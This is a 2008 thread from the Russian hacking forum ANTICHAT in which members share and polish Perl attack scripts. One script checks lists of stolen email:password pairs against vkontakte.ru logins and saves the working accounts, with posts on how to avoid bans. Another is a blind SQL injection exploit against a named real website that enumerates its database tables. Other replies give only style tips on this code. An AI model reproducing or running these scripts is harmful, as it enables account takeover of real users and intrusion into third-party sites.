ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
19.06.2008, 14:17
|
|
Постоянный
Регистрация: 15.06.2007
Сообщений: 527
Провел на форуме:
1734541
Репутация:
214
|
|
хы а если рандомайз на юзер агент воткнуть )
а то что один айпи это еще не причина бана мб мы из одной сети сидим через шлюз ) все 20 000 человек ))))) и у всех у нас опера или лиса )
|
|
|
21.06.2008, 00:45
|
|
Постоянный
Регистрация: 15.06.2007
Сообщений: 527
Провел на форуме:
1734541
Репутация:
214
|
|
Есть у когонитбудь простой примерчик многопоточности?
скиньте плиз )
|
|
|
|
22.06.2008, 17:02
|
|
Постоянный
Регистрация: 03.08.2007
Сообщений: 367
Провел на форуме:
876216
Репутация:
209
|
|
Нет, не в одной подсетисети дело - как миниму странно будет то, что 1 ИП будет с разных акков логиниться, запрашивать rate.php и уходить с сайта
|
|
|
|
22.06.2008, 20:17
|
|
Постоянный
Регистрация: 15.06.2007
Сообщений: 527
Провел на форуме:
1734541
Репутация:
214
|
|
ну можно передлать чтоб с главной брал рейтинг ) какие проблемы? )
вот рабочий код.
ЗЫ можно еще сделать чтоб на pda.vkontakte.ru ломилсмя трафа меньше есть и проверка быстрее пойдет )
Код HTML:
#!/usr/bin/perl
# VKONTAKTE cheker
# Original author Xszz.AoH
# Modified by svesve
# tnx to a4at members who help me with perl ;-)
use strict;
use LWP::UserAgent;
use HTTP::Cookies;
open (FILE , '<logs.txt');
my @f = <FILE>;
chomp @f;
my $ua = LWP::UserAgent->new;
my $cookies = HTTP::Cookies->new(agent => 'Opera/9.50 (X11; Linux x86_64; U; ru)');
$ua->cookie_jar($cookies);
open (OUT , '>>IDS_rate.txt');
while (@f)
{
my ($mail, $pass) = split(/:/, shift(@f));
my $req = $ua->post('http://vkontakte.ru/login.php', { email => $mail, pass => $pass } )->as_string;
my $suc = $req =~ /302 Found/;
if ($suc )
{
$req = $ua->get('http://vkontakte.ru/index.php')->as_string;
my $id = $req =~ /(a href="http:\/\/vkontakte.ru\/id)(\d+)(">)/;
my $idd=$2;
my $res = $1 if $req=~m/<div id="percent">(.{1,4})</;
print "[rate=$res]:[id=$idd]:$mail:$pass\n";
if (!$idd)
{
print "Account deleted \n";
}
print OUT $res.":".$idd.":".$mail.":".$pass."\n";
}
else{print"[-]bad login or password \n";}
}
close OUT;
close FILE;
Последний раз редактировалось svesve; 22.06.2008 в 21:17..
|
|
|
|
22.06.2008, 22:17
|
|
Постоянный
Регистрация: 03.08.2007
Сообщений: 367
Провел на форуме:
876216
Репутация:
209
|
|
Всетаки замени
Код:
if (!$idd)
{
print "Account deleted \n";
}
На чтото типа
Код:
(print "Accont $mail is deleted\n" and next) if !$idd;
|
|
|
|
22.06.2008, 23:20
|
|
Banned
Регистрация: 12.01.2007
Сообщений: 113
Провел на форуме:
4094601
Репутация:
495
|
|
Код:
(print "Accont $mail is deleted\n" and next) unless $idd;
|
|
|
|
23.06.2008, 10:03
|
|
Познающий
Регистрация: 22.04.2008
Сообщений: 32
Провел на форуме:
137918
Репутация:
56
|
|
Подскажите плиз!
Написал свой первый скрипт-exploit на перле, подскажите, как правильнее\лучше написать с точки зрения синтаксиса?
Скрипт рабочий.
Код:
#!/usr/bin/perl
use LWP;
my $browser = LWP::UserAgent->new;
my $url = "http://e-rfo.ru/?i=logon";
print "Starting sql-code injection...\n";
&GetTables('',0,0,'');
sub GetTables{
my ($ascii_set,$tnl, $node, $tn);
$ascii_set = $_[0];
$tnl = $_[1];
$node = $_[2];
$tn= $_[3];
my $curr_tnl = $tnl+1;
my $curr_tn = '';
my $curr_set = '';
my $curr_node = $node+1;
my $table_finded = 0;
for $i (95..122)
{
if (length($tn) == 0)
{
$curr_tn = chr($i);
}
else
{
$curr_tn = "$tn" .chr($i);
}
if (length($ascii_set) == 0)
{
$curr_set = $i;
}
else
{
$curr_set = $ascii_set.','.$i;
}
$char = 'CHAR('.$curr_set.')';
$post = "admin' AND 1=(SELECT TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE LEFT(TABLE_NAME,$curr_tnl)=$char UNION ALL SELECT TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE LEFT(TABLE_NAME,$curr_tnl)=$char)/*";
$response = $browser->post($url, ['login' => $post, 'password' => '', 'op' => 'login']);
$content = $response->content;
if ($content =~ "Subquery returns more than 1 row")
{
print "LEFT(TABLE_NAME,$curr_tnl) is: ",$curr_tn,"\n";
$table_finded = 1;
GetTables($curr_set, $curr_tnl, $curr_node, $curr_tn);
if ($curr_node > 5)
{
return;
}
}
else
{
if (length($curr_tn) > 1 && $table_finded == 0 && $i == 122)
{
print "Table name is: " .substr($curr_tn,0,length($curr_tn)-1)."\n";
}
}
if ($response->is_success == false)
{
print "connection error...\n";
}
$curr_set = '';
}
}
|
|
|
|
23.06.2008, 10:10
|
|
Постоянный
Регистрация: 03.08.2007
Сообщений: 367
Провел на форуме:
876216
Репутация:
209
|
|
Код:
use warnings 'all';
use strict;
use diagnostics;
|
|
|
|
23.06.2008, 10:19
|
|
Познавший АНТИЧАТ
Регистрация: 27.04.2007
Сообщений: 1,044
Провел на форуме:
3660186
Репутация:
905
|
|
подпрограммы не нужно вызывать, ставя перед их вызовом амперсанд.
Быть может, не так надо?
Код:
$ascii_set = $_[0];
$tnl = $_[1];
$node = $_[2];
$tn= $_[3];
А вот так?
Код:
my ($ascii_set, $tnl, $node, $tn) = @_;
Последний раз редактировалось krypt3r; 23.06.2008 в 10:22..
|
|
|
|
23.06.2008, 10:57
|
|
Постоянный
Регистрация: 03.08.2007
Сообщений: 367
Провел на форуме:
876216
Репутация:
209
|
|
Код:
$curr_tn = "$tn" .chr($i);
Да че у вас всех мания переменные в двойных ковычках писать?  ))
Интерпретатор болше времени затрачивает на парсинг
Вот это
Код:
if (length($tn) == 0)
{
$curr_tn = chr($i);
}
else
{
$curr_tn = "$tn" .chr($i);
}
Можно записать ИМХО немного читаеме и удобнее, чтото типа того:
Код:
$curr_tn = (length($tn) > 0 ? chr($i) : $tn.chr($i))
И ИМХО лучше
Код:
if ($response->is_success == false)
{
print "connection error...\n";
}
Записать так:
Код:
exit print "Connection error..." if(!response->is_success)
Хотя форматирование и стиль кода - сугубо личное дело каждого...у меня вообще звиздос иногда творится )))
Последний раз редактировалось biophreak; 23.06.2008 в 11:02..
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид